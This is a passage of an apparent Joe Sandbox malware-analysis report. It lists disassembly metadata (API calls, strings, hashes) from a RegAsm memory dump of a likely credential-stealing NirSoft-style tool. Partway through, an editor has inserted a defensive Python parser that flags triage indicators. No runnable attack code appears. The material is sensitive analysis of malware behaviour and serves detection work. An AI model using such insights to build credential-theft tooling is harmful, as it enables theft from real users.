                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                • String ID: 4$h
                                                                                • API String ID: 4019544885-1856150674
                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                • String ID: 0$6
                                                                                • API String ID: 4066108131-3849865405
                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004082EF
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                • memset.MSVCRT ref: 00408362
                                                                                • memset.MSVCRT ref: 00408377
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 290601579-0
                                                                                • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$wcslen
                                                                                • String ID:
                                                                                • API String ID: 239872665-3916222277
                                                                                • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                • String ID: %s (%s)$YV@
                                                                                • API String ID: 3979103747-598926743
                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                • API String ID: 2767993716-572158859
                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                APIs
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                • API String ID: 3176057301-2039793938
                                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                APIs
                                                                                Strings
                                                                                • out of memory, xrefs: 0042F865
                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                • database is already attached, xrefs: 0042F721
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                • API String ID: 1297977491-2001300268
                                                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
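The blocks above carry the evidence a triager cares about in scattered form: `GetModuleHandleW(ntdll.dll)` next to a String ID full of `Nt*` export names (run-time resolution of native APIs), the NirSoft HTML report template and translation-INI keys (`TranslatorName`, `TranslatorURL`, read via `GetPrivateProfile*`), and SQLite's `ATTACH` error strings (an embedded SQLite engine, consistent with the browser-credential signatures in the overview). The helper below is an added example, not Joe Sandbox code and not part of this report: it parses the plain-text layout of these function blocks (section headers `APIs`, `Strings`, `Memory Dump Source`, `Similarity`, bullets beginning with `•`) and flags those combinations per block, keyed by the block's `API String ID`. The indicator labels and rules are this editor's heuristics; the sample input is an excerpt reproduced from blocks listed above, and any listing that deviates from this layout (for example a different bullet character) is an assumption the parser does not cover.

```python
"""Parse Joe Sandbox IDA-plugin function blocks and flag triage indicators.

Added helper (not Joe Sandbox code). Assumes the plain-text layout used in
this report; the indicator rules are heuristics written for this sample.
"""
import re

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "• LoadMenuW.USER32(?,?), ref: 0040D97F" or
# "• Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: ..."
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)(?:\(|\s|$)")
# "• API String ID: 4139908857-2887671607"
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")

# (label, rule(haystack_of_strings, list_of_apis)) -- heuristics, not signatures
INDICATORS = [
    ("dynamic_ntdll_resolution",
     lambda hay, apis: "ntdll.dll" in hay and re.search(r"\bNt[A-Z]", hay) is not None),
    ("nirsoft_html_report_template",
     lambda hay, apis: "nirsoft.net" in hay),
    ("nirsoft_translation_ini",
     lambda hay, apis: "TranslatorName" in hay
     and any(a.startswith("GetPrivateProfile") for a in apis)),
    ("embedded_sqlite",
     lambda hay, apis: "cannot ATTACH database within transaction" in hay),
]


def parse_blocks(text):
    """One dict per function block; a block starts at each bare 'APIs' header."""
    blocks, block, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            block = {"apis": [], "subcall_apis": [], "strings": [], "meta": {}}
            blocks.append(block)
            section = "APIs"
            continue
        if block is None:          # fragment before the first complete block
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                key = "subcall_apis" if m.group("sub") else "apis"
                block[key].append(f"{m.group('name')}.{m.group('module')}")
        elif section == "Strings":  # "• <string>, xrefs: 0042F865"
            parts = line.lstrip("• ").rsplit(", xrefs: ", 1)
            if len(parts) == 2:
                block["strings"].append(parts[0])
        else:                       # key/value bullets (Similarity, dump source)
            m = KV_RE.match(line)
            if m:
                block["meta"][m.group("key")] = m.group("value")
    return blocks


def flag_indicators(blocks):
    """Map indicator label -> list of API String IDs of the blocks that hit."""
    hits = {}
    for b in blocks:
        # Strings appear either as xref bullets or $-joined in "String ID".
        hay = "$".join(b["strings"] + [b["meta"].get("String ID", "")])
        apis = b["apis"] + b["subcall_apis"]
        for label, rule in INDICATORS:
            if rule(hay, apis):
                hits.setdefault(label, []).append(b["meta"].get("API String ID", "?"))
    return hits


# Constructed sample: three blocks excerpted from this report's listing.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
Strings
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 4139908857-2887671607
APIs
  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 0040DAFB
• GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
Strings
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-2039793938
APIs
Strings
• out of memory, xrefs: 0042F865
• cannot ATTACH database within transaction, xrefs: 0042F663
Similarity
• API ID: memcpymemset
• API String ID: 1297977491-2001300268
"""

if __name__ == "__main__":
    for label, ids in sorted(flag_indicators(parse_blocks(SAMPLE)).items()):
        print(f"{label}: {', '.join(ids)}")
```

Run it against the full report text instead of `SAMPLE` to get, per indicator, the `API String ID` values to pivot on; matching blocks in other dumps of the same family will share those IDs even when the fuzzy hashes differ.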
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
• memcpy.MSVCRT ref: 0040EB80
• memcpy.MSVCRT ref: 0040EB94
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: ($d
• API String ID: 1140211610-1915259565
• Opcode ID: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
• Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
• Opcode Fuzzy Hash: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
• Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• API String ID: 3015003838-0
• Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
• Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
• memset.MSVCRT ref: 00413ADC
• memset.MSVCRT ref: 00413AEC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• memset.MSVCRT ref: 00413BD7
• wcscpy.MSVCRT ref: 00413BF8
• CloseHandle.KERNEL32(?), ref: 00413C4E
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID: 3A
• API String ID: 3300951397-293699754
• Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
• Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
• Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
• Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
• Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
• Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
APIs
• memset.MSVCRT ref: 00411AF6
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 00411B14
• wcscat.MSVCRT ref: 00411B2E
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: AE$.cfg$General$EA
• API String ID: 776488737-1622828088
• Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
• Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
APIs
• memset.MSVCRT ref: 0040D8BD
• GetDlgCtrlID.USER32(?), ref: 0040D8C8
• GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
• memset.MSVCRT ref: 0040D906
• GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
• _wcsicmp.MSVCRT ref: 0040D92F
  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
• Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
• Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
• Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
• Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• FreeLibrary.KERNEL32(00000000), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Library$FreeLoadMessage
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 3897320386-317687271
• Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
• Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 4271163124-70141382
• Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
• Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
• Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
• Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 4139908857-3953557276
• Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
• Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
• Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
• Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
• Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
• Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• API String ID: 4218492932-0
• Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
• Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
• memcpy.MSVCRT ref: 0044A8BF
• memcpy.MSVCRT ref: 0044A90C
• memcpy.MSVCRT ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
• memcpy.MSVCRT ref: 0044A9D8
• memcpy.MSVCRT ref: 0044AA19
• memcpy.MSVCRT ref: 0044AA4A
Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
• Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
• Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
• Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
• Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
